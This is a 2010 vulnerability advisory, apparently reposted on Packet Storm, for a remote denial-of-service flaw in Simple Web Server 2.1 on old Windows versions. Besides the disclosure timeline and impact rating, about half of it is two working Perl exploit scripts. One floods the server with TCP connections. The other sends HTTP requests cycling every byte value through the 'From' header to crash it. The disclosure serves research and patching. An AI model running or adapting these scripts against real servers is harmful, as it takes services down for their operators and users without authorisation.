Simple Web Server version 2.1 suffers from a remote denial of service vulnerability.
8e2bad1ba2d0a3b09947469053b39636ae1cc03c1915d5fa75e20bad1e854862[DCA-0003]
[Software]
- Simple Web Server
[Vendor Product Description]
- The easy and small way to open an HTTP Web Server. OS
Versions:Windows9x/Me/NT/2000/XP
[Bug Description]
- SwS can't handle the header 'From:' when using random ASCII
characters leading to Denial-of-Service.
[History]
- Advisory sent to vendor on 06/14/2010.
- No response from vendor
- Public advisory & exploit 08/02/2010.
[Impact]
- Low
[Affected Version]
- Simple Web Server SwS v2.1
- Prior versions may also be vulnerable
[Code]
#!/usr/bin/perl
use IO::Socket;
$ip = $ARGV[0];
$port = $ARGV[1];
$conn = $ARGV[2];
$num = 0;
while ( $num <= $conn ) {
system("echo -n .");
$s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
close($s);
$num++;
}
#!/usr/bin/perl
use Net::HTTP;
if (@ARGV < 1) {
usage();
}
$host = @ARGV[0];
$port = @ARGV[1];
$num = 0;
print "[+] Sending request...\n";
while ($num <= 255) {
my $s = Net::HTTP->new(Host => $host, HTTPVersion => "1.0") || die $@;
$s->write_request(GET => "/", 'User-Agent' => "Mozilla/5.0",
'From' => chr($num));
$num++;
close($s);
}
print "\n[+] Done!\n";
sub usage() {
print "[-] Usage: <". $0 ."> <host> <port>\n";
print "[-] Example: ". $0 ." 127.0.0.1 80\n";
exit;
}
[Credits]
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
[Greetz]
Crash and all Dclabs members.
--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed